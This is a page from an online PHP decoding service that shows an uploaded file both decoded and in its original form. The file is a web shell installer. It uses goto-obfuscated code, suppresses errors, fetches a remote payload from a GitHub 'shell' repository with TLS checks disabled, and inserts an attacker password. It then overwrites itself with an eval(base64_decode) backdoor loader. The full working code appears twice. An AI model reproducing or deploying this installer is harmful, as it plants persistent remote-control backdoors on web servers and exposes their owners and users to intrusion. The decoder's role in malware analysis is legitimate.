Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* Don't change anything otherwise this code does not work. ...........

Decoded Output download

<?php  
  
/*  
  
Don't change anything otherwise this code does not work.  
  
..........Developer...........  
.                            .  
.    *** Samiul Alim ***     .  
.  [email protected]  .  
.    fb : samiul.alim.1230   .  
.     tg : samiulalim1230    .  
.                            .  
..............................  
  
    Copyright  2023  
  
*/  
  
goto SEcN6; J5Ux5: function createFileFopen($file, $data) { $fileHandle = fopen($file, "w"); if ($fileHandle === false) { return false; } else { $bytesWritten = fwrite($fileHandle, $data); fclose($fileHandle); if ($bytesWritten !== false) { return true; } else { return false; } } } goto SoP_E; oGV0N: $mr999plus = str_replace("\", "/", __DIR__) . "/" . basename(__FILE__); goto RdDrx; MWZ3b: function string_to_octal($str) { $rtn = ''; $chars = str_split($str); foreach ($chars as $c) { $rtn .= "\" . str_pad(base_convert(ord($c), 10, 8), 3, 0, STR_PAD_LEFT); } return $rtn; } goto J5Ux5; RdDrx: function getDecode($encode) { $key = "SamiulAlim"; $chiper = "AES-128-CTR"; $iv = hex2bin("2c269a65037c190f4994f11c0f1e37c0"); return openssl_decrypt($encode, $chiper, $key, 0, $iv); } goto ZWtfo; ZWtfo: function getContent($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_HTTPHEADER, array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36")); $output = curl_exec($curl); curl_close($curl); return $output; } goto MWZ3b; SoP_E: if (isset($_POST["password"], $_POST["version"], $_POST["colour"])) { $password = string_to_octal($_POST["password"]); $version = explode("|SHELL|", getDecode($_POST["version"])); $php = getContent($version[0]); $index = string_to_octal($version[1]); $script = string_to_octal($version[2]); $style = string_to_octal(getDecode($_POST["colour"])); if ($php == '') { $result["success"] = false; $result["msg"] = "Install failed!"; } else { $install = "<?php eval(base64_decode('" . base64_encode(str_replace("|HACKER|", $password, str_replace("|SCRIPT|", $script, str_replace("|STYLE|", $style, str_replace("|INDEX|", $index, $php))))) . "')); ?>"; if (createFileFopen($mr999plus, $install)) { $result["success"] = true; } else { if (file_get_contents($mr999plus, $install)) { $result["success"] = true; $result["msg"] = "Installed successfully!"; } else { $result["success"] = false; $result["msg"] = "Install permission denied!"; } } } header("Content-Type: application/json; charset=utf-8"); die(json_encode($result)); } else { echo getContent("https://github.com/samiulalim1/shell/raw/main/install/index.html"); } goto LTYUP; SEcN6: error_reporting(0); goto oGV0N; LTYUP:   
  
?>

Did this file decode correctly?

Original Code

<?php 
 
/* 
 
Don't change anything otherwise this code does not work. 
 
..........Developer........... 
.                            . 
.    *** Samiul Alim ***     . 
.  [email protected]  . 
.    fb : samiul.alim.1230   . 
.     tg : samiulalim1230    . 
.                            . 
.............................. 
 
    Copyright  2023 
 
*/ 
 
goto SEcN6; J5Ux5: function createFileFopen($file, $data) { $fileHandle = fopen($file, "w"); if ($fileHandle === false) { return false; } else { $bytesWritten = fwrite($fileHandle, $data); fclose($fileHandle); if ($bytesWritten !== false) { return true; } else { return false; } } } goto SoP_E; oGV0N: $mr999plus = str_replace("\", "/", __DIR__) . "/" . basename(__FILE__); goto RdDrx; MWZ3b: function string_to_octal($str) { $rtn = ''; $chars = str_split($str); foreach ($chars as $c) { $rtn .= "\" . str_pad(base_convert(ord($c), 10, 8), 3, 0, STR_PAD_LEFT); } return $rtn; } goto J5Ux5; RdDrx: function getDecode($encode) { $key = "SamiulAlim"; $chiper = "AES-128-CTR"; $iv = hex2bin("2c269a65037c190f4994f11c0f1e37c0"); return openssl_decrypt($encode, $chiper, $key, 0, $iv); } goto ZWtfo; ZWtfo: function getContent($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_HTTPHEADER, array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36")); $output = curl_exec($curl); curl_close($curl); return $output; } goto MWZ3b; SoP_E: if (isset($_POST["password"], $_POST["version"], $_POST["colour"])) { $password = string_to_octal($_POST["password"]); $version = explode("|SHELL|", getDecode($_POST["version"])); $php = getContent($version[0]); $index = string_to_octal($version[1]); $script = string_to_octal($version[2]); $style = string_to_octal(getDecode($_POST["colour"])); if ($php == '') { $result["success"] = false; $result["msg"] = "Install failed!"; } else { $install = "<?php eval(base64_decode('" . base64_encode(str_replace("|HACKER|", $password, str_replace("|SCRIPT|", $script, str_replace("|STYLE|", $style, str_replace("|INDEX|", $index, $php))))) . "')); ?>"; if (createFileFopen($mr999plus, $install)) { $result["success"] = true; } else { if (file_get_contents($mr999plus, $install)) { $result["success"] = true; $result["msg"] = "Installed successfully!"; } else { $result["success"] = false; $result["msg"] = "Install permission denied!"; } } } header("Content-Type: application/json; charset=utf-8"); die(json_encode($result)); } else { echo getContent("https://github.com/samiulalim1/shell/raw/main/install/index.html"); } goto LTYUP; SEcN6: error_reporting(0); goto oGV0N; LTYUP:  
 
?>

Function Calls

None

Variables

None

Stats

MD5 8d6821f54fbbca83b55619b90527fcff
Eval Count 0
Decode Time 63 ms